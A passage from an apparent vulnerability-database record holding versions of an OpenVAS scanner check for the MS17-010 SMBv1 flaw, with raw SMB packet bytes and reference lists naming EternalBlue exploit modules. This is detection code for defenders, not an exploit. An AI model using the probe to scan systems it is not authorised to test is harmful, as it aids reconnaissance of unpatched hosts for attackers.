0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB Session Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02,\n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c,\n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{\n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 9, "lastseen": "2020-06-05T17:28:22"}, {"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "f87b6d5b6fe3ffeff051672734d2b866afc064b1df4304c9d6741aa18e496ef4", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2019-05-29T18:34:28", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"modified": "2019-05-29T18:34:28", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:34:28", "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 x32/x64 Edition\n Microsoft Windows Server 2012 Edition\n Microsoft Windows Server 2016\n Microsoft Windows 8.1 x32/x64 Edition\n Microsoft Windows Server 2012 R2 Edition\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02,\n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c,\n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{\n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 7, "lastseen": "2019-05-29T18:34:28"}, {"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "a3447e850d22905839987fef587d9ffcf354da8c08bcd9df76da0565dac23375", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2018-09-01T23:43:34", "history": [], "viewCount": 13, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms17-010_remote.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"$Revision: 7543 $\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\n\n Impact Level: System\");\n\n script_tag(name:\"affected\", value:\"\n Microsoft Windows 10 x32/x64 Edition\n Microsoft Windows Server 2012 Edition\n Microsoft Windows Server 2016\n Microsoft Windows 8.1 x32/x64 Edition\n Microsoft Windows Server 2012 R2 Edition\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n 